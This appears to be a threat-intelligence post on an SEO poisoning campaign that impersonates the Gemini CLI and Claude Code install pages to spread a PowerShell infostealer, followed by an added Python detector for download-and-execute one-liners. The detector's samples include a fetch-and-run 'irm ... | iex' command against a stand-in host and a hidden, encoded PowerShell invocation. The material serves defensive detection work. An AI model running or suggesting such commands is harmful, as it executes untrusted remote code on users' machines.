SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer

Executive summary


  • Financially motivated eCrime actors will likely continue to expand opportunistic campaigns by impersonating AI platforms. These campaigns generate direct supply chain risk for enterprises, as threat actors target software developer tooling, including AI coding assistants and package managers, to compromise developer workstations.
  • In early March 2026, EclecticIQ analysts identified an ongoing infostealer campaign targeting Gemini CLI and Claude Code users. Threat actors use SEO poisoning to surface fake domains above legitimate results, directing victims to attacker-controlled infrastructure that mimics genuine AI agent installation pages.
  • The infostealer targets Windows endpoints and executes entirely in memory through PowerShell, harvesting credentials and sensitive data from a wide range of applications before exfiltrating the results in encrypted form to a command-and-control server.
  • Beyond credential theft, the malware provides arbitrary remote code execution capability, which financially motivated operators leverage to transition into hands-on-keyboard intrusions against selected victims and execute interactive code within the compromised environment.
  • Installations from these impersonated websites result in exfiltration of OAuth tokens, CI/CD credentials, corporate VPN details, and sensitive files, giving adversaries a direct path to initial access into the wider enterprise network.
  • This campaign shows that financially motivated threat actors are capitalizing on widespread enterprise adoption of AI platforms to deliver infostealer malware.
  • Despite sustained law enforcement action, including Operation Magnus against RedLine and META in October 2024 and the May 2025 disruption of LummaC2 infrastructure, infostealer deployment against enterprise targets will likely continue to grow in the near term. Low operating costs and persistent demand for stolen credentials in underground markets sustain this trajectory.

Typosquatted domains impersonate Gemini and Claude Code installation

The Gemini CLI impersonation campaign was first publicly identified by independent threat researcher @g0njxa [1], whose initial discovery enabled the analysis and infrastructure pivoting documented in this report. The infection chain begins with a Google search by a developer looking for the official Gemini CLI [2] or Claude Code [3] installation page. Threat actors use SEO poisoning to surface a fake domain at the top of the search results, above the legitimate source. The victim clicks through, lands on a malicious page visually consistent with a genuine vendor installation guide, and is prompted to execute a single command to complete the install.
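The two points above that a defender can act on directly are the copy-and-run install one-liner at the end of the infection chain and, from the executive summary, the fact that the infostealer runs entirely in memory through PowerShell. The following Python is an added example, not EclecticIQ's tooling and not code from the report: it scores a pasted install command for in-memory execution patterns and runs the same rules over PowerShell script block log entries. Every command, domain (`example.invalid`), host name and log line in it is a constructed sample, not an indicator from the campaign, and the log line layout is an assumed flattened format rather than a real Windows event export.

```python
"""Heuristic triage for copy-and-run install one-liners and PowerShell
script block log entries. Added example; all samples are constructed."""
import re

# Each rule is (name, regex). The patterns target the behaviour the post
# describes (remote content pulled into memory and executed by PowerShell),
# not any specific domain or payload from the campaign.
RULES = [
    ("remote_to_interpreter",
     re.compile(r"(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|curl|wget)\b"
                r".*\|\s*(iex|Invoke-Expression|sh|bash|powershell)\b", re.I)),
    ("download_string_cradle",
     re.compile(r"New-Object\s+Net\.WebClient.*DownloadString", re.I)),
    ("invoke_expression",
     re.compile(r"\b(iex|Invoke-Expression)\b", re.I)),
    ("encoded_command",
     re.compile(r"-(e|ec|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden_or_bypass",
     re.compile(r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|-nop\b", re.I)),
    ("non_https_fetch",
     re.compile(r"\bhttp://", re.I)),
]

# Any one of these alone is enough to stop and inspect the command.
HIGH_CONFIDENCE = {"remote_to_interpreter", "download_string_cradle", "encoded_command"}


def assess_command(cmd: str) -> list:
    """Return the names of all rules the command matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmd)]


def is_suspicious(cmd: str) -> bool:
    """Flag on any high-confidence indicator, or on two or more weaker ones."""
    hits = assess_command(cmd)
    return bool(HIGH_CONFIDENCE.intersection(hits)) or len(hits) >= 2


# Assumed flattened layout for script block logging entries (Event ID 4104).
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) EventID=(?P<eid>\d+) Host=(?P<host>\S+) User=(?P<user>\S+) '
    r'ScriptBlockText="(?P<text>.*)"$'
)

# Constructed sample log; the base64-looking argument is a placeholder, not a payload.
SAMPLE_SCRIPT_BLOCK_LOG = [
    '2026-03-05T10:12:03Z EventID=4104 Host=DEV-WS01 User=alice '
    'ScriptBlockText="irm https://example.invalid/gemini-cli/install.ps1 | iex"',
    '2026-03-05T10:12:09Z EventID=4104 Host=DEV-WS01 User=alice '
    'ScriptBlockText="powershell -nop -w hidden -ep bypass -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"',
    '2026-03-05T10:15:41Z EventID=4104 Host=DEV-WS02 User=bob '
    'ScriptBlockText="Get-ChildItem C:\\Projects | Measure-Object"',
    '2026-03-05T10:16:02Z EventID=4103 Host=DEV-WS02 User=bob '
    'ScriptBlockText="Write-Host done"',
]


def scan_script_block_log(lines: list) -> list:
    """Return one dict per suspicious 4104 entry: host, user, timestamp, indicators."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m.group("eid") != "4104":
            continue  # only script block text carries the executed content
        text = m.group("text")
        if is_suspicious(text):
            findings.append({
                "ts": m.group("ts"),
                "host": m.group("host"),
                "user": m.group("user"),
                "indicators": assess_command(text),
            })
    return findings


if __name__ == "__main__":
    for cmd in ("irm https://example.invalid/install.ps1 | iex",
                "npm install -g @google/gemini-cli"):
        print(f"{'SUSPICIOUS' if is_suspicious(cmd) else 'clean':10} {cmd}")
    for f in scan_script_block_log(SAMPLE_SCRIPT_BLOCK_LOG):
        print(f["ts"], f["host"], f["user"], ", ".join(f["indicators"]))
```

The rules deliberately key on how content reaches the interpreter (fetch piped into `iex`, `DownloadString`, encoded and hidden-window invocations) rather than on any domain, so they keep working when the actor rotates infrastructure; the cost is that legitimate `irm ... | iex` installers will also be flagged, which is the intended outcome when the goal is to make a developer pause and verify the source before running it.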

Malware Analysis, News and Indicators - Latest topics